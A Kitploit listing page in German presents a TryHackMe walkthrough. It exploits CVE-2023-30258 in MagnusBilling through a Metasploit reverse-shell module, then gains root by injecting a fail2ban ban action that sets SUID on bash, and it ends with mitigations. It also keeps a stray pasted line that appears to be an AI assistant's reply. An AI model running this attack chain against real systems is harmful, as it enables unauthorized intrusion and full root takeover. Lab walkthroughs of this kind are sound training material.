Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
THM-MagnusBilling-CVE-2023-30258-Exploit — Schritt-für-Schritt-Anleitung zur Ausnutzung von CVE-2023-30258 (MagnusBilling RCE) und zur Privilegienerweiterung durch eine fail2ban-Fehlkonfiguration in einer TryHackMe-Lab-Umgebung. Demonstriert Web-Enumeration, Metasploit-Ausnutzung und Linux-Privilegienerweiterung. | Kitploit
Tools/GitHubGitHub/cyb3rk0ala/thm-magnusbilling-cve-2023-30258-exploit
Privilege EscalationAufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsCommand and ControlLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Labs & Praxis
GitHubcyb3rk0ala/thm-magnusbilling-cve-2023-30258-exploit

THM-MagnusBilling-CVE-2023-30258-Exploit

Schritt-für-Schritt-Anleitung zur Ausnutzung von CVE-2023-30258 (MagnusBilling RCE) und zur Privilegienerweiterung durch eine fail2ban-Fehlkonfiguration in einer TryHackMe-Lab-Umgebung. Demonstriert Web-Enumeration, Metasploit-Ausnutzung und Linux-Privilegienerweiterung.

Repository anzeigen
vor 9 TagenNoch nicht geprüft

THM-MagnusBilling-CVE-2023-30258

Perfekt! Lassen Sie uns Ihre vollständige Ausarbeitung in professionelles Deutsch umwandeln, bereit für ein GitHub-Repository. Ich habe es auch für Klarheit und Lesbarkeit poliert – dies ist Material auf Portfolio-Niveau.

⸻

🛡️ MagnusBilling RCE → Root (CVE-2023-30258)

📌 Übersicht • Ziel: 10.145.148.203 • Plattform: TryHackMe • Schwachstelle: CVE-2023-30258 • Zugriff: Nicht authentifizierte Remote-Codeausführung (RCE) • Privilegienerweiterung: Fehlkonfiguration von fail2ban • Endgültiger Zugriff: Root

⸻

🔍 1. Aufklärung (Reconnaissance)

Port-Scan

rustscan -a 10.145.148.203

📊 Offene Ports

Port Dienst 22 SSH 80 HTTP 3306 MySQL 5038 Asterisk Screenshot 2026-04-08 um 22:09:15

Die Anwesenheit von Asterisk deutet auf ein VoIP-/Abrechnungssystem hin.

⸻

🌐 2. Web-Enumeration

Verzeichnis-Fuzzing

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
-u "http://10.145.148.203/mbilling/FUZZ" -ic -c

📁 Funde: • /archive • /assets • /lib • /tmp • /protected

Der Pfad /mbilling wird als potenzieller Angriffsvektor identifiziert. Screenshot 2026-04-08 um 22:06:08

⸻

🚨 3. Identifikation der Schwachstelle

CVE-2023-30258

MagnusBilling ist anfällig für: • Nicht authentifizierte Remote-Codeausführung (RCE) • Befehlseinschleusung (Command Injection) • Vollständige Kompromittierung des Systems

⸻

💣 4. Ausnutzung (Metasploit)

msfconsole

search CVE:2023-30258

use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

set RHOSTS 10.145.148.203 set LHOST tun0 set LPORT 4444 run Screenshot 2026-04-08 um 22:03:12 Screenshot 2026-04-08 um 22:03:39

⸻

🎯 Ergebnis

Meterpreter-Sitzung geöffnet

sysinfo

OS: Linux Debian User: asterisk

Screenshot 2026-04-08 um 22:04:03

⸻

🔐 5. Erster Zugriff

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

whoami

asterisk

⸻

🏁 6. User-Flag

cd /home/magnus cat user.txt

⸻

🔎 7. Privilegienerweiterung

sudo prüfen

sudo -l

(ALL) NOPASSWD: /usr/bin/fail2ban-client

Kritische Fehlkonfiguration erkannt!

Screenshot 2026-04-08 um 22:22:42

⸻

💣 8. Ausnutzung von Fail2Ban

Bösartige Aktion hinzufügen

sudo fail2ban-client set mbilling_login addaction evil

sudo fail2ban-client set mbilling_login action evil actionban "chmod +s /bin/bash"

sudo fail2ban-client set mbilling_login banip 127.0.0.1

Screenshot 2026-04-08 um 22:05:14

⸻

🚀 9. Root-Zugriff

/bin/bash -p

id

euid=0(root)

Anfangs gab whoami asterisk zurück. Durch die Verwendung von bash -p wird zu Root eskaliert.

Screenshot 2026-04-08 um 22:05:40

⸻

👑 10. Root-Flag

cat /root/root.txt

⸻

🧠 11. Wichtige Erkenntnisse • CVE-Ausnutzung ermöglichte einfachen ersten Zugriff • Web-Enumeration ist entscheidend (ffuf identifizierte /mbilling) • Fehlkonfiguriertes sudo kann zur vollständigen Systemkompromittierung führen • fail2ban kann für die Privilegienerweiterung missbraucht werden

⸻

🛡️ 12. Gegenmaßnahmen • MagnusBilling auf die neueste Version aktualisieren • NOPASSWD aus der sudo-Konfiguration entfernen • Zugriff auf fail2ban-client einschränken • Webanwendungen und Endpunkte härten

⸻

💀 Fazit

Diese Maschine demonstriert eine realistische Angriffskette:

Web-RCE → Shell → Privilegienerweiterung → Root

Eine Kombination aus Schwachstelle und Fehlkonfiguration führte zur vollständigen Systemkompromittierung.

Tool herunterladen